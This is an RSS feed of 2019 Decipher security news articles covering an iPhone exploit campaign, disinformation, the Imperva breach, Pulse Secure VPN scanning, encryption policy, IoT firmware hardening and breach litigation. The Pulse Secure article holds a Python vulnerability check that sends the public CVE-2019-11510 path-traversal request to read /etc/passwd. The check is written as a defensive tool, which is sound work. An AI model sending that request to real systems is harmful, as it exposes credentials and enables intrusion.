<![CDATA[Decipher]]> https://decipher.sc Decipher is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world. Fri, 30 Aug 2019 00:00:00 -0400 en-us info@decipher.sc (Amy Vazquez) Copyright 2019 3600 <![CDATA[Long-Running Attack Campaign Targeted iPhones]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/long-running-attack-campaign-targeted-iphones https://duo.com/decipher/long-running-attack-campaign-targeted-iphones Fri, 30 Aug 2019 00:00:00 -0400

For at least two years, an unknown group of attackers was using several complex chains of exploits for vulnerabilities in iOS to compromise the iPhones of visitors to a handful of hacked websites and install a piece of malicious software that could steal any information on the device and send real-time location tracking data back to the attackers.

The exploit chains were in use from around the time that iOS 10 was released in September 2016 up through the beginning of 2019, and each individual chain worked against the latest, fully patched version of iOS available at the time. Researchers with Google’s Threat Analysis Group discovered the hacked websites that the attackers were using in early 2019 and eventually uncovered the five individual exploit chains. Working with researchers from Google’s Project Zero, the team analyzed the exploits, the attack techniques, the vulnerabilities the exploits targeted, and the victim profiles and pieced together the details of a long-running, expertly crafted campaign targeting iPhone users.

Two of the vulnerabilities that Project Zero discovered were still unpatched at the time, and the team reported the bugs to Apple, which released an out-of-band update for iOS in February to fix them. Interestingly, unlike many campaigns that use zero-day vulnerabilities, this campaign didn’t target a small group of users.

“There was no target discrimination; simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant. We estimate that these sites receive thousands of visitors per week,” Ian Beer of Project Zero wrote in one of a series of detailed posts on the iOS attack campaign.

“TAG was able to collect five separate, complete and unique iPhone exploit chains, covering almost every version from iOS 10 through to the latest version of iOS 12. This indicated a group making a sustained effort to hack the users of iPhones in certain communities over a period of at least two years.”

The attack scenario in this campaign, known as a watering hole attack, is a common one, but it’s more often used in lower-level campaigns carried out by cybercrime groups. The technique relies on victims happening upon the hacked sites on their own, rather than being directed to the sites through a spear phishing campaign. The combination of watering hole attacks, zero-day vulnerabilities, and exploit chains that work against fully patched iOS devices is more indicative of a nation-state campaign than a cybercrime operation.

The malware that this campaign installed on victims’ devices also was quite sophisticated. It has the ability to access unencrypted messages stored on the device by apps including iMessage and WhatsApp, both of which encrypt messages from end to end. The implant also makes copies of the photos on a victim’s device and the entire contacts database and uploads the contents of the device’s keychain, which contains the victim’s credentials and other sensitive data. In short, the implant is the kind of malware that attackers dream of having on an iPhone.

“All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly."

“There is no visual indicator on the device that the implant is running. There's no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system. The implant is primarily focused on stealing files and uploading live location data. The implant requests commands from a command and control server every 60 seconds,” Beer said.

“The implant has access to all the database files (on the victim’s phone) used by popular end-to-end encryption apps like Whatsapp, Telegram and iMessage.”

The implications of this attack campaign are quite interesting. Most campaigns with this level of effort, investment, and expertise are constructed to target a relatively small number of people. That could be a handful of diplomats or political dissidents in a specific country or it could be executives at a few companies in a specific industry. The financial and technical resources needed to develop the exploit chains as well as the implant are significant, which limits the number of groups capable of producing them. This is the kind of work most often associated with intelligence agencies and other nation-state affiliated adversary groups, but those groups typically don’t expend their resources on indiscriminate watering hole attacks.

For people who don’t necessarily fall into a high-risk group, this research underscores the fact that high-level adversaries may not be targeting them specifically, but exploitation is still a possibility.

“Real users make risk decisions based on the public perception of the security of these devices. The reality remains that security protections will never eliminate the risk of attack if you're being targeted. To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group,” Beer said.

“All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them.”

]]>
<![CDATA[Disinformation Attacks Aren't Just Against Elections]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/disinformation-attacks-aren-t-just-against-elections https://duo.com/decipher/disinformation-attacks-aren-t-just-against-elections Thu, 29 Aug 2019 00:00:00 -0400

Lies proliferate on social media, and it is even harder to sift out truth from fiction when it looks like the message is coming from a real person. Mix in some uncertainty as to whether the falsehood is part of a deliberate campaign to hurt the company or just typical online shenanigans, and it's the beginnings of a security headache.

Dealing with false claims posted on social media or other online platforms falls under online reputation management and is generally the responsibility of marketing or public relations, not traditional security. And while disinformation is getting a lot of attention in security circles, the discussion primarily tends to be in the context of election security. However, hacking social media accounts, or creating fake accounts, to post false messages about a company is absolutely a disinformation campaign and warrants at least some kind of a discussion within the security team.

“We are seeing more instances of individuals and groups using disinformation tactics to target companies, which is much more than a brand issue,” said Cindy Otis, director of analysis at Nisos.

Earlier this week, a Twitter account belonging to an English professor posted that Olive Garden was one of the companies “funding Trump’s election in 2020” and suggested that people should stop going to the restaurant. As is fast becoming common whenever politics and well-known brands collide, Twitter users responded with calls for a boycott. Over a two-day period, the #BoycottOliveGarden hashtag received more than 52,500 mentions (including tweets, quote tweets, and retweets) from 48,700 users, giving it a reach of 139.4 million and generating 169.4 million impressions.

The initial message was false.

“We don’t know where this information came from, but it is incorrect. Our company does not donate to presidential candidates,” the restaurant chain posted on its social media channels over and over again, trying to counter the boycott messages. When the speculation switched to the restaurant’s parent company, Olive Garden added, “To clarify, Darden does not donate to federal candidates.”

While this looked like just another day of social media monitoring and political discord on Twitter, there was a twist: the account owner was not responsible for the initial message.

A Cascade

About a day after the initial message was originally posted, the owner of the account said someone had compromised the Twitter account and posted that false detail about Olive Garden. The original message was removed and the account owner tried to set the record straight, but lies spread much more readily on social media than truth. And once a lie gains traction, it is really hard to debunk it.

“Social media posts like this were often the initial stages of a cascade,” said Greg Young, vice-president of cybersecurity at Trend Micro. The more legitimate an account appears, the more likely that the message will get amplified. A compromised account—such as that of an established English professor—is the “perfect seed,” Young said.

While disinformation campaigns frequently rely on a bot army or a network of fake accounts to post and spread the false content, research from the Massachusetts Institute of Technology found that false reports get retweeted more by humans than by bots. This is the cascade Young mentioned—as the false information percolates through the platform, legitimate, uncompromised accounts increase the campaign's momentum as regular people start pushing the content.

“The idea was to get the ball rolling in order for the natural effects of a social network to take the planted message and make it trend,” Young said.

Misinfo-as-a-service

Abusing social media to damage an organization’s reputation is a commonly used tactic, and according to Trend Micro’s research on Twitter activity, spreading misinformation is a common service offered in underground and “gray” marketplaces. Researchers identified examples of services offering to post messages by "influential" accounts with thousands of followers and other types of manipulation campaigns in an earlier Trend Micro report on disinformation online.

These offerings can be considered an “outgrowth of existing services such as black hat search engine optimization, click fraud, and the sale of human and bot traffic,” Trend Micro wrote at the time.

In this instance, one false tweet was able to reach more than 100 million people. “A coordinated plan to hack multiple accounts to spread disinformation could have more devastating consequences,” Otis said.

Breach Lesson

The Olive Garden incident highlights another important lesson about post-data breach response. The email address associated with the Twitter account responsible for the initial post about the restaurant and the password for that email account were both exposed in an earlier (different) data breach, Otis said. As the information was available in underground forums, there are two possible ways the Twitter account was compromised: the attacker tried the email password and found that the password had been reused, or the attacker had control of the email account (using the exposed credentials) and reset the password using Twitter’s forgot-password mechanism.

It’s not known whether the same password was reused for Twitter, but password reuse continues to be a problem. The original poster admitted having been advised, repeatedly, to change passwords after the email account was compromised, but had not done so. With the recent wave of data breaches, the reminders to change passwords can get annoying, but it is an important first line of defense to keep accounts from getting compromised. Turning on multi-factor authentication boosts the odds even more.
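One practical way to act on those reminders is to check whether a password has already shown up in a known breach corpus. The sketch below is a hypothetical illustration, not anything used in this incident: it queries the Have I Been Pwned "Pwned Passwords" range API, which uses a k-anonymity scheme so that only the first five characters of the password's SHA-1 hash ever leave the machine.

```python
import hashlib
import urllib.request

def sha1_prefix_suffix(password):
    """Split the uppercase SHA-1 hex digest into the 5-character range
    prefix sent to the API and the 35-character suffix matched locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

def count_in_range_response(suffix, body):
    """Parse a 'SUFFIX:COUNT' response body and return how many times the
    hashed password appeared in known breaches (0 if it is absent)."""
    for line in body.splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate == suffix:
            return int(count)
    return 0

def breach_count(password):
    """Query the Pwned Passwords range API; only the hash prefix is sent."""
    prefix, suffix = sha1_prefix_suffix(password)
    url = f"https://api.pwnedpasswords.com/range/{prefix}"
    with urllib.request.urlopen(url) as resp:
        return count_in_range_response(suffix, resp.read().decode("utf-8"))
```

A nonzero result means the password has been seen in breach data and should never be reused on another account.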

Typically, when victims are told to change their passwords, and to make sure they aren't reusing passwords, the focus is on follow-up attacks against them. Lose control of the email account and bank accounts will be compromised. Personal information leaked means potential for spear phishing attacks. But as this incident shows, the attacker may not care about the owner of the account at all. The account is a way to get ahold of the tools necessary to carry out an attack completely unrelated to the breached victim. In this case, a social media account that can be used to mess with a chain restaurant.

Might be a Coincidence

Earlier in the month, a handful of Twitter accounts circulated a list of popular fast-food restaurants supposedly supporting the Trump re-election campaign. The list didn't get a lot of attention initially, and the Washington Post said the information was incorrect, but the list continued to float around. The fact that Olive Garden was included on that list may just be a coincidence, or it may indicate that some kind of advance effort was underway to lay the groundwork for this kind of campaign.

It's a cycle. Someone may see a post on social media about a company. If a quick search (usually on the same platform) pulls up other people talking about the same post, as well as older posts that seem to be about the same thing, the results lend credibility to the post.

Social media monitoring is a valuable intelligence gathering tool, as security teams can uncover details about ongoing threats and attack indicators buried inside social media posts. Social media posts are often the first indicator that issues are being exploited or a company is being targeted. It also means expanding the definition of disinformation to recognize that false information posted online can directly affect a company's overall risk.

]]>
<![CDATA[Imperva Discloses Data Breach, Theft of Customer API Keys]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/imperva-discloses-customer-data-breach-theft-of-api-keys https://duo.com/decipher/imperva-discloses-customer-data-breach-theft-of-api-keys Wed, 28 Aug 2019 00:00:00 -0400

Security firm Imperva says that the API keys and SSL certificates of some of the customers who use the company’s Cloud Web Application Firewall were exposed in a recent breach, along with the email addresses and hashed passwords of a larger group of customers.

The company became aware of the breach on August 20, when a third party informed company officials of the problem. The data exposure only affects customers of the Cloud WAF product, which was formerly known as Incapsula, and is limited to customers who had accounts through September 15, 2017.

“On August 20, 2019, we learned from a third party of a data exposure that impacts a subset of customers of our Cloud WAF product who had accounts through September 15, 2017,” said Chris Hylen, CEO of Imperva.

“We profoundly regret that this incident occurred and will continue to share updates going forward. In addition, we will share learnings and new best practices that may come from our investigation and enhanced security measures with the broader industry. Imperva will not let up on our efforts to provide the very best tools and services to keep our customers and their customers safe.”

Though the exposure of customer email addresses and hashed and salted passwords is problematic, the much larger issue is the exposure of the API keys and SSL certificates. With those in hand, an attacker would have privileged access to the target customer’s Cloud WAF installation. That access could allow the attacker to modify rules on the WAF to let their own traffic, or that of other attackers, through.

As part of the response to the breach, Imperva officials have forced password resets for all of the affected customers and are encouraging them to enable two-factor authentication on their accounts. The 2FA options that Imperva provides include getting passcodes through email or SMS, or using the Google Authenticator app.
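Authenticator apps like Google Authenticator generate those passcodes with the TOTP algorithm (RFC 6238), which is just HOTP (RFC 4226) keyed to the current 30-second window. A minimal standard-library sketch, shown for illustration and not drawn from Imperva's implementation:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HMAC-based one-time password."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation: low nibble of last byte
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, at=None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 time-based OTP: HOTP over the current time window."""
    moving_factor = int((time.time() if at is None else at) // step)
    return hotp(secret, moving_factor, digits)
```

Because the code is derived from a shared secret plus the clock, a stolen password alone is not enough to log in, which is why enabling 2FA blunts credential-theft incidents like this one.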

The Imperva Cloud WAF is one of a handful of enterprise-class WAFs that are designed to provide protection from web-based attacks through a cloud-based implementation.

]]>
<![CDATA[Attackers Targeting Vulnerability in Pulse Secure VPN]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/attackers-targeting-vulnerability-in-pulse-secure-vpn https://duo.com/decipher/attackers-targeting-vulnerability-in-pulse-secure-vpn Tue, 27 Aug 2019 00:00:00 -0400

Attackers are actively scanning for endpoints running versions of the popular Pulse Secure VPN software that are vulnerable to a critical remotely exploitable vulnerability that was disclosed recently.

There is a publicly available exploit for the bug, and researchers have seen large-scale scanning activity by attackers searching for vulnerable machines. Pulse Secure is an SSL VPN that is used in many enterprise environments and the details of the vulnerability have been public for several weeks now. The weakness allows a remote attacker to read an arbitrary file on a vulnerable system, potentially stealing passwords or other sensitive data. It affects several versions of the Pulse Connect Secure and Pulse Policy Secure software. Pulse Secure posted an initial advisory on the vulnerability in late April, but after researchers discussed the bug at Black Hat in early August, attackers took notice.

“This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform a remote arbitrary file access on the Pulse Connect Secure gateway. This advisory also includes a remote code execution vulnerability that can allow an authenticated administrator to perform remote code execution on Pulse Connect Secure and Pulse Policy Secure gateways. Many of these vulnerabilities have a critical CVSS score and pose significant risk to your deployment,” the advisory says.

In the last few days, researchers began noticing widespread scans by systems looking for machines that are vulnerable to CVE-2019-11510, the arbitrary file read vulnerability. The attackers typically are trying to get to the file that contains users’ passwords for the VPN.

“On Thursday, August 22, 2019, our honeypots detected opportunistic mass scanning activity from a host in Spain targeting Pulse Secure “Pulse Connect Secure” VPN server endpoints vulnerable to CVE-2019-11510. This arbitrary file reading vulnerability allows sensitive information disclosure enabling unauthenticated attackers to access private keys and user passwords. Further exploitation using the leaked credentials can lead to remote command injection (CVE-2019-11539) and allow attackers to gain access inside the private VPN network,” Troy Mursch of threat intelligence firm Bad Packets said in a post on the scanning activity.

“On Friday, August 23, 2019, our honeypots detected additional mass scanning for CVE-2019-11510 from another host in Spain. In both cases, the exploit activity attempted to download the “etc/passwd” file which contains the usernames associated with the VPN server (not client accounts). A successful “HTTP 200/OK” response to this scan indicates the VPN endpoint is vulnerable to further attacks. Given the ongoing scanning activity, it’s likely the attackers have enumerated all publicly accessible hosts vulnerable to CVE-2019-11510.”
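The scanning Bad Packets observed can be reproduced as a simple unauthenticated check. The sketch below is a defensive illustration, not the attackers' tooling; the traversal path is an assumption taken from the publicly posted proof of concept for CVE-2019-11510, and the check should only be pointed at hosts you are authorized to test.

```python
import http.client
import ssl

# Path-traversal request from the published CVE-2019-11510 proof of concept
# (assumed here; verify against your own copy before relying on it).
TRAVERSAL_PATH = (
    "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd"
    "?/dana/html5acc/guacamole/"
)

def looks_vulnerable(status, body):
    """A 200 response containing passwd-style entries means the endpoint
    served the requested file to an unauthenticated client."""
    return status == 200 and b"root:" in body

def check_host(host, timeout=10.0):
    """Send the traversal request to one host and interpret the reply."""
    # VPN appliances frequently use self-signed certificates.
    ctx = ssl._create_unverified_context()
    conn = http.client.HTTPSConnection(host, timeout=timeout, context=ctx)
    conn.request("GET", TRAVERSAL_PATH)
    resp = conn.getresponse()
    vulnerable = looks_vulnerable(resp.status, resp.read())
    conn.close()
    return vulnerable
```

http.client is used deliberately here: unlike higher-level libraries, it sends the path as-is rather than normalizing away the `../` sequences the check depends on.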

The vulnerability is obviously quite serious on its own, but late last week an exploit for it was published on GitHub, making the situation even more concerning. Pulse Secure has patches available for all of the vulnerable versions, and enterprises should prioritize that fix, given the current scanning and availability of the exploit.

Mursch said Bad Packets did a scan of its own to enumerate vulnerable endpoints and found more than 14,000 systems that were still vulnerable to CVE-2019-11510, more than a third of which are in the United States.

]]>
<![CDATA[Encryption Experts Asked G7 to Set the Right Example]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/encryption-experts-asked-g7-set-right-example https://duo.com/decipher/encryption-experts-asked-g7-set-right-example Tue, 27 Aug 2019 00:00:00 -0400

Prior to the beginning of the G7 summit in France, encryption experts around the world wrote an open letter to G7 leaders asking them not to undermine encryption. While the end of the summit didn’t result in any pro-encryption statements from the G7 leaders, the fact that there weren’t any new calls for lawful access may be a relief.

Lawful access is a legal concept governing how governments can intercept or seize information as part of law enforcement or intelligence activity. Some governments want to legally require companies to provide law enforcement and intelligence agencies with access to encrypted content. Even though cryptographers and encryption experts have warned that there isn’t a way to set up encryption so that only “good guys” can read it and “bad guys” can’t, government officials continue to argue that there must be a technical way to make this happen.

The G7 Open Letter was a “call to the G7 and other world leaders not to undermine encrypted services in pursuit of law enforcement access to encrypted content,” said Christine Runnegar, senior director of Internet Trust at the Internet Society. That includes not asking for intentional backdoors in services and products that use encryption, disclosing vulnerabilities in a timely manner so that they can be patched, not disabling encryption where it is turned on by default, and not banning or restricting the use of encrypted services.

Insisting on this course of action would undermine the security of digital communication and data, and make everyday activities such as online banking, online shopping, and keeping in touch with friends and family hard to do.

“[Notably,] we ask you to protect and promote strong encryption which is the foundation for our digital economies, digital societies, and interdependent lives,” the experts wrote in “A Joint Call to World Leaders for a Secure and Trusted Digital Economy.” The letter was signed by more than 30 global organizations, including the Internet Society, Access Now, Electronic Frontier Foundation, Association for Progressive Communications, and the World Wide Web Foundation.

These are troubling times. The United Kingdom and Australia have passed legislation requiring service providers to be able to hand over to law enforcement the contents of encrypted communications. India wants message traceability for end-to-end encrypted messaging apps. The government of Kazakhstan asked the country’s internet service providers to encourage users to install a government-controlled root certificate on their computers. The United States has long called for lawful access, and Attorney General William Barr signaled that the Department of Justice is willing to push for lawful access, especially for personal encrypted messaging apps such as WhatsApp.

At the last G7 ministers summit in April, the finance ministers expressed support for law enforcement to have backdoor access to encrypted communications, while acknowledging the importance of “not prohibiting, limiting, or weakening encryption.” The resolution from that summit urged technology companies to “establish lawful access solutions for their products and services, including data that is encrypted,” for law enforcement (and related authorities) to access when necessary (in the case of an investigation, for example), “while ensuring that assistance requested from internet companies is underpinned by the rule of law and due process protection.”

This G7 summit did not release a similar statement.

However, the “Five Eyes” nations—the United Kingdom, United States, Australia, Canada, and New Zealand, whose intelligence agencies share information—met in London recently and echoed the demands for backdoor access (UK’s GCHQ has called it a “ghost protocol”) so that they can investigate serious crimes and acts of terrorism. UK police have claimed that at least one of the people involved in the terror attack on the London Bridge used the encrypted messaging app WhatsApp, but that they are unable to see the contents of the messages.

For the encryption experts, it was critical to remind the G7 leaders that encryption technologies “protect the integrity and confidentiality of digital data and communications” by securing web browsing, online banking, and critical public services like electricity, elections, hospitals and transportation. The demands for lawful access bring “uncertainty and impact to customers’ buying decisions” because customers are left wondering whom to trust with their data, Runnegar said. The diminished trust in security products and, by extension, the companies behind them, would have “consequences for tech export markets, jobs, and innovation in the security industry,” Runnegar said.

Just before the G7 leaders met, a coalition of trade groups representing some of the largest technology companies in the United States, Europe, and the Asia-Pacific sent a letter with 12 recommendations on global technology issues. In that letter, which touched upon digital trade, cross-border data flows, tax policy, and AI, the trade groups recommended the G7 enhance cybersecurity by using “risk-based approaches grounded in global, consensus-based, industry-led standards and best practices.” The letter was signed by trade groups such as the Information Technology Industry Council (ITI), Computer & Communications Industry Association, the Communications and Information Network Association of Japan, Software and Information Industry Association, and techUK.

The groups said the member countries should “Oppose measures that force disclosure of source code, algorithms, encryption keys, or other sensitive information as a condition of doing business,” something companies are worried will happen more as countries pass their own laws around encryption.

“Other countries look to the G7 when making their own policies and laws, so what the G7 countries do could be replicated across the world,” Runnegar said. “We are asking leaders to set the right example on encryption.”

]]>
<![CDATA[Data Shows IoT Security is Moving Backward]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/data-shows-iot-security-is-moving-backward https://duo.com/decipher/data-shows-iot-security-is-moving-backward Mon, 26 Aug 2019 00:00:00 -0400

The security of IoT devices has been a running joke for many years, so much so that some researchers have given up trying to point out the weaknesses and get vendors to address the problems. Some vendors have pledged to do better and improve their development practices, but a year-long analysis of the security features in the firmware of 22 IoT device manufacturers found that not only are the vendors not making progress on security, they’re actually going backward.

The study is the work of the Cyber Independent Testing Lab, a small non-profit that performs rigorous testing of the security features and properties of a variety of products and platforms. The team wanted to see how IoT vendors were faring in adding standard hardening features to their firmware binaries, so it developed a special methodology that began with downloading available firmware updates from vendor websites, extracting Linux filesystems from the firmware, and then running each binary through the CITL’s custom analytic tools. The dataset comprises more than 3.3 million individual binaries from nearly 5,000 firmware updates from 22 vendors, including ASUS, D-Link, Belkin, QNAP, and Mikrotik, and goes back as far as 2003.

What the team found is dispiriting, if not surprising: IoT firmware hardening is getting worse rather than better. Firmware updates are more likely to remove binary hardening features than to add them, and overall there hasn’t been any trend in a positive direction for security in the 15 years covered by the CITL dataset.

“The best possibility I can theorize is that a team pulls in a new library that’s helpful with some feature and finds that it won’t build against a binary that has some additional hardening turned on, so someone removes one of the hardening flags and then it works fine so they go with it,” said Parker Thompson, lead engineer at CITL.

“Security testing for binary hardening flags hasn’t reached the state of being a regression test yet.”

The CITL study looked for the presence of a number of possible hardening techniques, such as ASLR, non-executable stacks, and stack guards. These technologies are used to mitigate the effects of certain vulnerabilities and have been in wide use in the desktop and server worlds for many years. They have begun to make their way into IoT device firmware in the last few years, but the CITL data shows that updates often remove one or more of the hardening flags and some updates significantly reduce the overall security of the firmware. For example, one update shipped in 2017 by Ubiquiti for its UAP-HD line of wireless access points removed ASLR altogether and the presence of stack guards went from about 70 percent of binaries to virtually none.
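CITL's analytic tools are custom and unpublished, but the kind of per-binary check the study describes can be sketched with a minimal ELF parser. The example below is a simplified illustration, limited to little-endian 64-bit ELF images, that reports three of the hardening properties mentioned above: PIE (which enables ASLR), a non-executable stack, and a hint of stack guards.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header marking stack permissions
PF_X = 0x1                 # execute permission flag

def parse_elf64(data):
    """Return (e_type, [(p_type, p_flags), ...]) for a little-endian
    64-bit ELF image given as bytes."""
    assert data[:4] == b"\x7fELF", "not an ELF image"
    e_type, = struct.unpack_from("<H", data, 16)
    e_phoff, = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    phdrs = []
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        phdrs.append((p_type, p_flags))
    return e_type, phdrs

def hardening_report(data):
    """Checksec-style summary of three binary hardening properties."""
    e_type, phdrs = parse_elf64(data)
    gnu_stack = [flags for ptype, flags in phdrs if ptype == PT_GNU_STACK]
    return {
        # ET_DYN (3) binaries can be loaded at a random base: PIE/ASLR.
        "pie": e_type == 3,
        # A PT_GNU_STACK segment without PF_X means a non-executable stack.
        "nx_stack": bool(gnu_stack) and not (gnu_stack[0] & PF_X),
        # The stack-protector failure handler hints that guards were compiled in.
        "stack_guard": b"__stack_chk_fail" in data,
    }
```

Run over every binary extracted from a firmware filesystem, a report like this makes regressions between updates easy to spot, which is essentially the comparison CITL performed at scale.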

One potential reason for the backward movement could be the size of the development teams for IoT products and the rapid pace of the market’s evolution and expansion.

“If you look at a Windows build through this same lens, it looks completely different. It would have virtually complete coverage for the hardening flags. I’d posit that these are much smaller teams that have much less continuity from one project to the next,” Thompson said.

“They’re rapidly responding to a low-cost, high-volume environment. The hints that I’ve found in the filesystems suggests that these are being developed all over the world with a great amount of variation among the teams.”

“We want to bring all of these common points to light and back it up with our data."

Although IoT devices often are associated with consumer applications, a tremendous amount of IoT gear finds its way into enterprise environments, as well, whether it’s through official purchases or shadow installations by employees. Many of the firmware images the CITL study looked at are from networking devices, which are vital to enterprises and therefore quite valuable for attackers.

“We found major regressions in access points you would ship to enterprises by the crate. When you take these things in aggregate, that’s a very soft target. It’s a very low cost to find an exploit in those,” Thompson said.

“We think this is beyond the pale in what is acceptable, especially considering many of these protections are on by default and the major players have been able to accomplish this. These are not companies that are new to technology. They’re not startups that are bootstrapping and just getting into hardware. But they’re always going to be driven by market forces.”

Along with the removal of various hardening techniques across updates, CITL also discovered a large number of identical binaries that were used by at least two separate vendors. There were more than 3,700 binaries duplicated across more than one vendor, a finding that Thompson said was likely a result of so many vendors using common toolchains and upstream suppliers. That duplication has a two-fold effect: an attractive attack target spread across multiple platforms and also a common path for improvement.

“Improving the security of these common binaries would be the first major move in a positive direction for the entire market,” he said. “We want to bring all of these common points to light and back it up with our data. We want to see where the blind spots are.”

Thompson said he'd like to come back to the study in a year or so to see how things have changed, if at all.

"There's a lot more we'd like to go digging into. We bring data to the table that can help disprove groupthink on these topics," he said.

]]>
<![CDATA[Georgia Supreme Court Considers When Data Breach Victims Can Sue]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/georgia-supreme-court-considers-when-data-breach-victims-can-sue https://duo.com/decipher/georgia-supreme-court-considers-when-data-breach-victims-can-sue Mon, 26 Aug 2019 00:00:00 -0400

The Georgia Supreme Court will weigh in on whether a data breach victim has to suffer actual financial loss before he or she can sue for damages.

When a data breach hits the headlines, the work is just beginning. The organization has to investigate the extent of the breach, identify who was affected, and come up with a plan to fix the issue so that the breach won’t happen again. The executives worry about the prospect of lawsuits and potential regulatory fines. The victims have to set up anti-fraud protections, such as buying identity theft protection, signing up for credit monitoring, and placing credit freezes. They have to scrutinize their financial statements for signs of fraudulent activity or other types of theft. There is very little the individual consumer can do to control the damage.

One way for the victims to hold the organizations responsible is to sue—to bring a class-action lawsuit—for negligence (for the data being stolen and putting them at risk). The courts, however, have been divided on whether or not the data breach victims are allowed to sue if their data has not yet been used fraudulently or if there was no follow-up attack using the stolen information. Some U.S. District Courts have allowed lawsuits against Home Depot, Target, Anthem, and Equifax to proceed. Other courts have dismissed lawsuits because the victims could not show they have been harmed by that particular breach.

“Until that day your life is ruined you get nothing? That is a very odd view of the law.” —Justice Nahmias

The Georgia courts thus far have ruled that victims cannot recover damages—the costs incurred to set up protections—if they could not show injury, and it is the Georgia Supreme Court’s turn to address the question.

On Aug. 20, the Georgia Supreme Court heard oral arguments in a class-action suit related to the June 2016 data breach at Georgia-based medical facility Athens Orthopedic. An attacker going by the name “Dark Overlord” stole personal information including names, addresses, dates of birth, telephone numbers, Social Security numbers, and health insurance details of 200,000 current and former patients. Athens Orthopedic advised victims to place fraud alerts on their credit accounts. The clinic did not provide identity theft monitoring or any other supporting service as recompense to the victims of the breach.

Three of the victims sued the clinic for negligence and breach of implied contract. The plaintiffs wanted compensation for the fees already paid, and future fees, for credit monitoring and identity theft protection services since they had to obtain them out of concern of what could happen after the data breach. These costs were “classic measures of consequential damages” because they were incurred to mitigate “foreseeable” damages, the plaintiffs argued. The court dismissed the lawsuit in June 2017, and the Georgia Court of Appeals ruled 2-1 that “costs of prophylactic measures” were “not recoverable damages.”

While some of the data was offered for sale on criminal forums and some information was publicly available on text-sharing site Pastebin, the plaintiffs could not point to actual fraudulent activity or theft that occurred as a result of the data breach. The courts said the victims needed to provide evidence of future harm that was not based on speculation. In other words, the plaintiffs would have to show evidence a crime would be committed against them before it happened.

During oral arguments, the Georgia Supreme Court justices asked the clinic’s attorneys what they expected the patients to do after learning they were part of a data breach. According to the Atlanta Journal-Constitution, Justice Sarah Warren said the “Dark Overlord” showed nefarious intent in stealing the information, and Justice Nels Peterson said the patients had a duty to mitigate what could happen next.

Justice David Nahmias asked if a person who was mugged and had their keys stolen should change locks to make sure the mugger didn’t break into the house or office next. He did not seem to think that waiting for people to be victims of identity theft was the answer.

“Until that day your life is ruined you get nothing? That is a very odd view of the law,” Nahmias said, according to the AJC report.

Implications Beyond Georgia

The Georgia Supreme Court is just the latest in a long line of courts that have grappled with the question of whether data breach victims can sue before their data is fraudulently used. The U.S. Supreme Court held in Spokeo v Robins that plaintiffs must demonstrate that an “injury in fact” has occurred, but did not clarify whether “risk of future harm” qualified as an injury.

The U.S. Court of Appeals for the Seventh Circuit said in Lewert v PF Chang’s China Bistro that “all class members should be allowed to show that they spent time and resources tracking down possible fraud, changing automatic charges, and replacing cards as a prophylactic measure.” The U.S. Courts of Appeals for the District of Columbia, Third, Sixth, and Ninth Circuits have ruled similarly.

The U.S. Court of Appeals for the Fourth Circuit held in Beck v McDonald that plaintiffs “failed to establish a non-speculative, imminent injury-in-fact.” The U.S. Courts of Appeals for the First, Second, and Eighth Circuits have ruled similarly.

How the Georgia Supreme Court decides this case will have broad implications, not just within Georgia, but for data breach victims elsewhere. The plaintiffs argued during oral arguments that with the increasing number of data breaches, future victims need to know exactly what their legal rights are, if any, and how they can go about protecting those rights.

“By ruling that the plaintiffs have failed to allege a compensable injury, the message delivered thus far in this case has been that data-breach victims in Georgia have no legal rights, regardless of how careless the defendant’s data security practices may have been,” the plaintiffs’ attorneys argued in their brief.

If the victims cannot hold the breached entity accountable, the attorneys argue, nothing changes. “It [Athens Orthopedic] continues to store the plaintiffs’ personally identifiable information on computer systems that employ the same lax security measures that permitted the hacker to access and steal the plaintiffs’ information,” the attorneys said.

From the breached entity’s standpoint, it is difficult to show that a particular data breach is directly responsible for fraudulent charges on a credit card. Ironically, the fact that there are so many data breaches makes it even harder to pinpoint which incident led to fraud. There may also be an expectation that most people already have some kind of identity theft protection, again, because there have been so many breaches already.

The fact that there is confusion on whether data breach victims have to prove actual fraud in order to bring a class-action lawsuit affects enterprise risk assessment and breach response planning, too. Enterprises can’t assess whether they have all the pieces in place to respond effectively in case of a data breach if they can’t properly assess the associated costs of a lawsuit.

The Georgia Supreme Court is expected to return a decision within six months, but it definitely won’t be the final word on the matter. Data breach victims and breached organizations will continue to battle the question in courts for years to come.

]]>
<![CDATA[Google and Mozilla Block Kazakhstan HTTPS Interception]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/google-and-mozilla-block-kazakhstan-https-interception https://duo.com/decipher/google-and-mozilla-block-kazakhstan-https-interception Thu, 22 Aug 2019 00:00:00 -0400

